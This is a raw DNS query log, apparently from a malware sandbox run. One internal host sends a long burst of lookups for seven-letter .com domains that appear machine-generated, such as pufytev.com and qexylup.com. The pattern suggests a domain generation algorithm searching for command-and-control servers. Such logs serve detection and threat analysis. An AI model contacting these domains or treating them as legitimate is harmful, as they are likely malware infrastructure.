                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.167392969 CET192.168.2.61.1.1.10xe28Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.168451071 CET192.168.2.61.1.1.10x7fc8Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.178723097 CET192.168.2.61.1.1.10x4e59Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.178896904 CET192.168.2.61.1.1.10x980fStandard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.188241005 CET192.168.2.61.1.1.10xa740Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.188728094 CET192.168.2.61.1.1.10x9b98Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.189227104 CET192.168.2.61.1.1.10xa01eStandard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190125942 CET192.168.2.61.1.1.10xeb8eStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190788984 CET192.168.2.61.1.1.10x3a38Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190943956 CET192.168.2.61.1.1.10x1463Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.191096067 CET192.168.2.61.1.1.10x5fedStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.199098110 CET192.168.2.61.1.1.10x55b9Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202320099 CET192.168.2.61.1.1.10x9fdStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202553034 CET192.168.2.61.1.1.10xdf4bStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202706099 CET192.168.2.61.1.1.10x193fStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202868938 CET192.168.2.61.1.1.10xdbeaStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.203031063 CET192.168.2.61.1.1.10x9d4fStandard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.203233957 CET192.168.2.61.1.1.10xa959Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.207597017 CET192.168.2.61.1.1.10xfcbcStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209248066 CET192.168.2.61.1.1.10xd69bStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209600925 CET192.168.2.61.1.1.10x96fdStandard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209758043 CET192.168.2.61.1.1.10xf174Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.210094929 CET192.168.2.61.1.1.10xc8d0Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.211731911 CET192.168.2.61.1.1.10xca4dStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.211895943 CET192.168.2.61.1.1.10xfe4fStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.216758013 CET192.168.2.61.1.1.10xb8ffStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.218492031 CET192.168.2.61.1.1.10x4f1eStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.219923973 CET192.168.2.61.1.1.10x1686Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.221342087 CET192.168.2.61.1.1.10x9ed0Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222589970 CET192.168.2.61.1.1.10x3816Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222776890 CET192.168.2.61.1.1.10x4f24Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222986937 CET192.168.2.61.1.1.10xdd68Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223011017 CET192.168.2.61.1.1.10xfc5eStandard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223531961 CET192.168.2.61.1.1.10xe9a0Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223581076 CET192.168.2.61.1.1.10x3b30Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.229156017 CET192.168.2.61.1.1.10xe47cStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230017900 CET192.168.2.61.1.1.10x27cdStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230739117 CET192.168.2.61.1.1.10x8810Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230739117 CET192.168.2.61.1.1.10x99f7Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.231937885 CET192.168.2.61.1.1.10x6fdStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.232171059 CET192.168.2.61.1.1.10xdd5fStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.002726078 CET192.168.2.61.1.1.10x9965Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.002727032 CET192.168.2.61.1.1.10x72e3Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.009799957 CET192.168.2.61.1.1.10xb9c9Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.011269093 CET192.168.2.61.1.1.10xc39fStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.030677080 CET192.168.2.61.1.1.10x30d9Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.031539917 CET192.168.2.61.1.1.10x5c99Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.053702116 CET192.168.2.61.1.1.10xf24dStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.633518934 CET192.168.2.61.1.1.10x9342Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.633570910 CET192.168.2.61.1.1.10x9b85Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.633955002 CET192.168.2.61.1.1.10xfd50Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.634044886 CET192.168.2.61.1.1.10x183dStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.634124041 CET192.168.2.61.1.1.10xa06eStandard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.634252071 CET192.168.2.61.1.1.10x5255Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.638997078 CET192.168.2.61.1.1.10x61c2Standard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.661858082 CET192.168.2.61.1.1.10x4283Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.663368940 CET192.168.2.61.1.1.10x3fe8Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.669218063 CET192.168.2.61.1.1.10x3ab7Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.034351110 CET192.168.2.61.1.1.10xfa97Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.038032055 CET192.168.2.61.1.1.10x66a8Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.042192936 CET192.168.2.61.1.1.10x76deStandard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.042536974 CET192.168.2.61.1.1.10x6424Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.051827908 CET192.168.2.61.1.1.10x942Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.052756071 CET192.168.2.61.1.1.10x72b3Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.137589931 CET192.168.2.61.1.1.10x1b69Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.163042068 CET192.168.2.61.1.1.10x73baStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.164978981 CET192.168.2.61.1.1.10xac75Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.184269905 CET192.168.2.61.1.1.10xefd4Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:06.019068956 CET192.168.2.61.1.1.10xc128Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.371062994 CET192.168.2.61.1.1.10x968bStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.495057106 CET192.168.2.61.1.1.10xefabStandard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.591576099 CET192.168.2.61.1.1.10xd7acStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.663789034 CET192.168.2.61.1.1.10x9756Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.753360033 CET192.168.2.61.1.1.10xdc7bStandard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.862262011 CET192.168.2.61.1.1.10x7ab0Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.866374969 CET192.168.2.61.1.1.10x3b04Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.885425091 CET192.168.2.61.1.1.10x8a23Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.899480104 CET192.168.2.61.1.1.10x107aStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.901992083 CET192.168.2.61.1.1.10xd6f9Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.902458906 CET192.168.2.61.1.1.10x1d06Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.907099009 CET192.168.2.61.1.1.10xad91Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.909259081 CET192.168.2.61.1.1.10x5103Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.911552906 CET192.168.2.61.1.1.10xd4deStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.912851095 CET192.168.2.61.1.1.10x53a3Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.930736065 CET192.168.2.61.1.1.10x73c7Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931464911 CET192.168.2.61.1.1.10x11cbStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931672096 CET192.168.2.61.1.1.10x2fdStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931849957 CET192.168.2.61.1.1.10xc2c7Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932225943 CET192.168.2.61.1.1.10x1733Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932482958 CET192.168.2.61.1.1.10x7f42Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932869911 CET192.168.2.61.1.1.10x8406Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.933080912 CET192.168.2.61.1.1.10x582eStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.965065002 CET192.168.2.61.1.1.10xac14Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966201067 CET192.168.2.61.1.1.10xd719Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966581106 CET192.168.2.61.1.1.10xfafaStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966834068 CET192.168.2.61.1.1.10xbdf7Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.012837887 CET192.168.2.61.1.1.10x3a99Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.085100889 CET192.168.2.61.1.1.10x36e0Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.192832947 CET192.168.2.61.1.1.10x6e8fStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.223048925 CET192.168.2.61.1.1.10x2272Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.316044092 CET192.168.2.61.1.1.10xc8e3Standard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328265905 CET192.168.2.61.1.1.10x8770Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328412056 CET192.168.2.61.1.1.10xe8e8Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328989029 CET192.168.2.61.1.1.10xe425Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.329674959 CET192.168.2.61.1.1.10x4ba8Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.331176996 CET192.168.2.61.1.1.10xaf6fStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.520868063 CET192.168.2.61.1.1.10xdf37Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.521030903 CET192.168.2.61.1.1.10x36beStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.531621933 CET192.168.2.61.1.1.10x165dStandard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.550911903 CET192.168.2.61.1.1.10x7393Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.554161072 CET192.168.2.61.1.1.10x5e91Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.556030035 CET192.168.2.61.1.1.10x4b69Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.556422949 CET192.168.2.61.1.1.10x9479Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.559467077 CET192.168.2.61.1.1.10x99f9Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.560183048 CET192.168.2.61.1.1.10x3fcbStandard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.561152935 CET192.168.2.61.1.1.10x463dStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.563647032 CET192.168.2.61.1.1.10xb6d8Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.565386057 CET192.168.2.61.1.1.10x542bStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.567495108 CET192.168.2.61.1.1.10xe760Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.570264101 CET192.168.2.61.1.1.10xd8e6Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580462933 CET192.168.2.61.1.1.10x8384Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580841064 CET192.168.2.61.1.1.10x5ce4Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580841064 CET192.168.2.61.1.1.10x612dStandard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.584475040 CET192.168.2.61.1.1.10xadc8Standard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.584475040 CET192.168.2.61.1.1.10xc284Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.587977886 CET192.168.2.61.1.1.10x11ffStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588399887 CET192.168.2.61.1.1.10x5456Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588787079 CET192.168.2.61.1.1.10x9e6cStandard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588787079 CET192.168.2.61.1.1.10x8c40Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.598807096 CET192.168.2.61.1.1.10x7cecStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.599735975 CET192.168.2.61.1.1.10xa4a9Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600119114 CET192.168.2.61.1.1.10x2f4aStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.332813978 CET192.168.2.61.1.1.10x7c62Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.341370106 CET192.168.2.61.1.1.10x890bStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.343056917 CET192.168.2.61.1.1.10x834bStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.346266985 CET192.168.2.61.1.1.10xb67bStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.394988060 CET192.168.2.61.1.1.10x390aStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.395199060 CET192.168.2.61.1.1.10xe6c5Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.399156094 CET192.168.2.61.1.1.10xce1aStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.401038885 CET192.168.2.61.1.1.10xc1e4Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.401431084 CET192.168.2.61.1.1.10x9beStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.407453060 CET192.168.2.61.1.1.10x4217Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.474196911 CET192.168.2.61.1.1.10xd65aStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.477722883 CET192.168.2.61.1.1.10xd39aStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.564053059 CET192.168.2.61.1.1.10x1074Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.568816900 CET192.168.2.61.1.1.10x9eaStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.034383059 CET192.168.2.61.1.1.10x5096Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.054358959 CET192.168.2.61.1.1.10x11cStandard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.130157948 CET192.168.2.61.1.1.10xe74eStandard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.144282103 CET192.168.2.61.1.1.10x78cbStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.145277023 CET192.168.2.61.1.1.10x8a1Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.151777983 CET192.168.2.61.1.1.10x9c85Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.168847084 CET192.168.2.61.1.1.10x9c61Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.200845957 CET192.168.2.61.1.1.10x8952Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.223198891 CET192.168.2.61.1.1.10x1b84Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.604166031 CET192.168.2.61.1.1.10x58d8Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.615231037 CET192.168.2.61.1.1.10xd1ebStandard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.615686893 CET192.168.2.61.1.1.10xfa1eStandard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616175890 CET192.168.2.61.1.1.10xb8cStandard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616507053 CET192.168.2.61.1.1.10xd1a8Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616853952 CET192.168.2.61.1.1.10xf87dStandard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616916895 CET192.168.2.61.1.1.10x3a71Standard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617285013 CET192.168.2.61.1.1.10x3770Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617721081 CET192.168.2.61.1.1.10xd88cStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617847919 CET192.168.2.61.1.1.10x1412Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.618421078 CET192.168.2.61.1.1.10x9cf6Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.619286060 CET192.168.2.61.1.1.10x7de1Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.619904041 CET192.168.2.61.1.1.10x3e27Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.639509916 CET192.168.2.61.1.1.10x8848Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.640820026 CET192.168.2.61.1.1.10xc056Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.661923885 CET192.168.2.61.1.1.10x4802Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662106037 CET192.168.2.61.1.1.10xc188Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662287951 CET192.168.2.61.1.1.10xc10cStandard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662441015 CET192.168.2.61.1.1.10x402cStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662607908 CET192.168.2.61.1.1.10xe2e7Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662767887 CET192.168.2.61.1.1.10xadaStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663192987 CET192.168.2.61.1.1.10xb479Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663336992 CET192.168.2.61.1.1.10x962dStandard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663486958 CET192.168.2.61.1.1.10xfe7dStandard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663616896 CET192.168.2.61.1.1.10xdbbfStandard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663743019 CET192.168.2.61.1.1.10x876Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
